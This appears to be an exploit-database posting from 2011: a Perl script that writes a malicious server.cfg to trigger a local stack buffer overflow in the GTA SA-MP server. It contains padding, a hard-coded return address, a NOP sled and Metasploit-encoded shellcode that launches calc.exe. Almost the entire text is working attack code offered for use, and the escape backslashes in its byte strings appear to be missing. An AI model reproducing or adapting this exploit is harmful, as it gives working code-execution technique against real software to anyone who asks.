Home / exploits GTA SA-MP server.cfg Buffer Overflow
Posted on 27 September 2011
# GTA SA-MP server.cfg Local Buffer Overflow Vulnerability (0day) # Date: 9-26-11 # Author: Silent_Dream # Software Link: http://team.sa-mp.com/files/samp03csvr_R2-2_win32.zip # Tested on: XP SP3, Windows 7 # Thanks to: corelanc0d3r & team, Metasploit, Exploit-db. #No PPRs found (app compiled with safeseh on), so this exploit uses EIP overwrite instead. #392 bytes max payload space (after this you hit SEH), 3 badchars: 0x1a, 0x0d, 0x0a. #Triggering Details: Overwrite server.cfg with this file, run samp-server.exe, boom calculator! my $file = "server.cfg"; #file must be named server.cfg for bug to trigger. my $head = "echo "; #probably not needed, tweak if you want. my $junk = "x41" x 379; my $eip = "xaax9fx42x00"; #push esp/ret in samp-server.exe my $nops = "x90" x 12; my $adjust = "x81xc4x54xf2xffxff"; #add esp, -3500 my $shellcode = #x86/shikata_ga_nai succeeded with size 227 (iteration=1) #Metasploit windows/exec calc.exe -b 'x1ax0dx0a' "xdbxc3xd9x74x24xf4xbexe8x5ax27x13x5fx31xc9" . "xb1x33x31x77x17x83xc7x04x03x9fx49xc5xe6xa3" . "x86x80x09x5bx57xf3x80xbex66x21xf6xcbxdbxf5" . "x7cx99xd7x7exd0x09x63xf2xfdx3exc4xb9xdbx71" . "xd5x0fxe4xddx15x11x98x1fx4axf1xa1xd0x9fxf0" . "xe6x0cx6fxa0xbfx5bxc2x55xcbx19xdfx54x1bx16" . "x5fx2fx1exe8x14x85x21x38x84x92x6axa0xaexfd" . "x4axd1x63x1exb6x98x08xd5x4cx1bxd9x27xacx2a" . "x25xebx93x83xa8xf5xd4x23x53x80x2ex50xeex93" . "xf4x2bx34x11xe9x8bxbfx81xc9x2ax13x57x99x20" . "xd8x13xc5x24xdfxf0x7dx50x54xf7x51xd1x2exdc" . "x75xbaxf5x7dx2fx66x5bx81x2fxcex04x27x3bxfc" . "x51x51x66x6axa7xd3x1cxd3xa7xebx1ex73xc0xda" . "x95x1cx97xe2x7fx59x67xa9x22xcbxe0x74xb7x4e" . "x6dx87x6dx8cx88x04x84x6cx6fx14xedx69x2bx92" . "x1dx03x24x77x22xb0x45x52x41x57xd6x3exa8xf2" . "x5exa4xb4"; open($File, ">$file"); print $File $head.$junk.$eip.$nops.$adjust.$shellcode; close($FILE);
